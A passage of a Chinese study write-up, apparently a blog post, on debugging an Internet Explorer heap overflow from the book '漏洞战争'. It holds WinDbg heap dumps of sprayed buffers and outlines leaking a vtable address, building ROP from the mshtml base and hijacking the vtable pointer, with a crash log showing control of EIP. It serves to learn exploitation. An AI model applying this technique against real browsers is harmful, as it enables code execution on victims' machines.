03f2b2e0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b2f0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b300 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b310 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b320 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b330 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b340 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b350 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b360 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b370 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b380 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b390 5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 [........a......
03f2b3a0 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b3b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b400 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b410 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b420 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b430 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b440 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b450 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b460 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b470 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b480 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b490 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b4a0 41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2 A.A.A...........
03f2b4b0 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b4c0 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b4d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b500 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b510 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b520 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b530 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b540 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b550 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b560 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b570 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b580 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b590 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b5c0 91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b5d0 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b5e0 e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 .....<.h........
03f2b5f0 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b600 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b620 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b650 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b660 00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03 ................
03f2b670 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b680 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b690 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6a0 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b6b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6d0 00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2 ................
03f2b6e0 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b6f0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b700 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b710 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b720 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b730 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b740 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b750 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b760 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b770 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b780 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b790 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b7a0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b7b0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b7c0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b7d0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b7e0 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b7f0 d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2b800 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b810 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b820 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b830 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b840 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b850 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b860 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b870 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b880 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b890 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8a0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b900 41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2 A.A.A...........
03f2b910 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b920 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b930 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b940 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b950 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b960 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b970 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b980 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b990 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2ba20 6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 m........j......
03f2ba30 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2ba40 50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 P....<.h........
03f2ba50 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2ba60 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2ba70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2ba80 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2ba90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bab0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bac0 00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03 ................
03f2bad0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bae0 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baf0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb00 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2bb10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb30 00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2 ........N.......
03f2bb40 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2bb50 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bb60 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bb70 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bb80 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bb90 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bba0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bbb0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bbc0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bbd0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bbe0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bbf0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bc00 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bc10 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bc20 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bc30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bc40 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2bc50 a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2bc60 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2bc70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc80 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc90 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bca0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcb0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcc0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcd0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bce0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcf0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd60 41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2 A.A.A...........
03f2bd70 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2bd80 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2bd90 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bda0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdb0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdc0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdd0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bde0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdf0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be20 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be30 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be40 42 00 42 00 42 00 42 00-42 00 42 00 B.B.B.B.B.B.

很简单的能观察到03f2ae30的AAAA字符串被大量覆盖,所以它就是vulheap。
为做对比,我多打印了很多,下面的未被覆盖的AAAA都是成片出现的。

不过对比漏洞战争书上,本来03f2b040地址处的fa被覆盖为48 00 01 00即0x00010048,这个覆盖看的出来(下图蓝色框线).
按照0x03f2ae30+0x100(EEEE…)+0x8(堆指针大小)+0x100(AAAA…)+0x8(堆指针大小)=03f2b040,也确实应该是这里,我应该没理解错。

但是很奇怪,我的fa也还在……(下图红色框线),这可能就是我之前弹窗打印出的虚表地址不正确的原因吧,感觉别人的文章里都不会这样……难以理解

得到虚表地址后,计算mshtml基地址,构造rop。

然后再次溢出,这次溢出直接像刚刚覆盖BBBB的大小一样,直接覆盖虚表指针,于是就可以劫持虚表指针到任意地址,如下。

1
2
3
4
5
6
7
(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024--->控制虚表指针 ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
003d006b 777a ja 003d00e7 [br=1]

总结

调试poc的时候还是比较顺利的,在调exp那里各种卡壳,唉。
主要还是学到了一些windbg的使用吧。
比如如果要下断点,其实可以在html里插入数学函数,比如用Math.cos,然后在jscript!Cos下断。
比如要查看jscript的导出表,可以在windbg里用x jscript!* 来查找,找虚表可以使用类似的方法(见上文)